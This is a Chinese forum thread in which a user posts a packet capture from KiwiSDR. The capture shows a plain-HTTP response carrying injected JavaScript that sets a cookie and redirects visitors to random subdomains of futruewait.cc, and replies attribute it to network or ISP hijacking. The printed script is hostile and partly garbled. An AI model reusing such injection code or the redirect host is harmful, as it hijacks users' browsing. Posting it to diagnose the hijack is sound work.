在使用 kiwisdr 的时候发生严重问题!
随后经过我的不懈努力,终于从抓包的文件中找到了一点痕迹:
`GET /public/ HTTP/1.1
Host: kiwisdr.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
If-None-Match: "2721824910"
If-Modified-Since: Sat, 29 Mar 2025 15:29:13 GMT
HTTP/1.1 200 OK
Content-Type: text/html
Cache-Control: no-cache
Content-length: 1009
Connection: close
<html><script type='text/javascript'>function getCookie(n){var c=document.cookie.split(';');for(var i=0;i<c.length;i++){var j=c.replace(/\s+|\s+$/g,'');if(j.indexOf(n+'=')===0)return j.substring(n.length+1)}return null};var k='_d250104',v=getCookie(k)'1111111111111111111111111@24@0@1@0@+@.futruewait.cc/trunks.html?k=s4&v=1281411368',r=v.split('@'),t=parseInt(r[2]),o=parseInt(r[3]),m=parseInt(r[4]),u=r.slice(6),i=t%u.length;if(++t>=o)r[0]=r[0].slice(0,-1)+'0';r[2]=t;var y=u.split('|');var x=r[5];var w=(x=='-'x=='+')?Math.floor(Math.random()y.length):x;if(x!='+'){var z=r[5].split('');z=w;r[5]=z.join('');};var e=new Date(m||(Date.now()+parseInt(r[1])3600000));r[4]=e.getTime();document.cookie=k+'='+r.join('@')+';expires='+e.toGMTString();function rd(u){var d='abcdefghijklmnopqrstuvwxyz0123456789',t='';for(var i=0;i<6;i++){var ri=Math.floor(Math.random()d.length);t+=d.charAt(ri);}return u.indexOf('*')===0?t+u.slice(1):u;};window.location.href='https://'+rd(y[w]);</script></html>HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Sat, 05 Apr 2025 15:34:41 GMT
ETag: "1625282316"
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 160571
Date: Sat, 05 Apr 2025 15:36:23 GMT
Server: lighttpd/1.4.35 `
- 已编辑
被注入了?
你本地的网络设备或者运营商问题,kiwisdr 是非安全 http 协议,可以劫持。
浏览器开发工具可以直接看到请求,没必要抓包。